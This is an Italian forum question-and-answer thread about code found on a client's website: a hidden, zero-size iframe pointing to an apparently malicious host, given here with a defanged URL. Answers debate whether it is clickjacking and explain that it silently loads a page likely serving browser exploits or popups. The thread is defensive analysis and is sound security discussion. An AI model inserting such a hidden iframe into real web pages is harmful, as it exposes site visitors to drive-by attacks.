Questo è il codice che ho trovato sul sito web del mio cliente:
?><noindex><nofollow>
<iframe src="htxp://atluscomdnsup23.ikwb.cxm/main.php?page=1f1214ff37a3022d" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe>
</iframe></nofollow></noindex>
Penso che questo sia in qualche modo un attacco di clickjacking e puoi leggerlo qui Tutorial per il clickjacking anche questo è un bel video sugli attacchi di clickjacking Simatic Clickjacking definito
Questo sta inserendo un iframe nascosto che punta a un sito Web (presumibilmente compromesso) che conterrà più codice malvagio.
Non sono d'accordo con la risposta di Ali Hussein, non sembra esserci alcuna relazione con il clickjacking, poiché non sta cercando di apparire sopra altri elementi della pagina. Cerca semplicemente di non essere visto.
Probabilmente, atluscomdnsup23 conterrà javascript che tenta di sfruttare vulnerabilità nel tuo browser, seguendo referral, aprendo popup pubblicitari, ecc.
Leggi altre domande sui tag malware